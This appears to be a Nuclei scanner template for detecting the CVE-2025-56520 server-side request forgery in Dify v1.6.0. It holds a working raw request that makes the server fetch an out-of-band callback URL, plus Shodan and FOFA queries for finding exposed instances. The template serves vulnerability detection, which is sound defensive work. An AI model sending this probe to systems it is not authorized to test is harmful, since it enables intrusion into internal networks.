Description
Dify v1.6.0 contains a server side request forgery caused by improper validation in controllers.console.remote_files.RemoteFileUploadApi, letting attackers make arbitrary requests from the server, exploit requires network access.
Dify v1.6.0 contains a server side request forgery caused by improper validation in controllers.console.remote_files.RemoteFileUploadApi, letting attackers make arbitrary requests from the server, exploit requires network access.
id: CVE-2025-56520
info:
name: Dify v1.6.0 - Server-Side Request Forgery
author: 0x_Akoko
severity: high
description: |
Dify v1.6.0 contains a server side request forgery caused by improper validation in controllers.console.remote_files.RemoteFileUploadApi, letting attackers make arbitrary requests from the server, exploit requires network access.
impact: |
Attackers can make arbitrary requests from the server, potentially accessing internal resources or sensitive data.
remediation: |
Update to the latest version.
reference:
- https://github.com/langgenius/dify
- https://dify.ai/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3
cve-id: CVE-2025-56520
epss-score: 0.00696
epss-percentile: 0.51296
cwe-id: CWE-918
metadata:
verified: true
max-request: 1
shodan-query: http.title:"Dify"
fofa-query: title="Dify"
tags: cve,cve2025,dify,ssrf,oast,oob,oss,vkev,vuln
http:
- raw:
- |
GET /console/api/remote-files/http%3A%2F%2F{{interactsh-url}}%2Ftest HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "file_type"
- "file_length"
condition: and
- type: word
part: content_type
words:
- "application/json"
- type: word
part: interactsh_protocol
words:
- "http"
- "dns"
condition: or
- type: status
status:
- 200
# digest: 4b0a004830460221008af32b3729fe9b40ab47550f4292504692b61d75e5cadc84b6cd103b35bee5580221008ecc18cb0ace3531273f4862ea6a649b5933216f10ee8455d82ecf6ea442ccb5:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.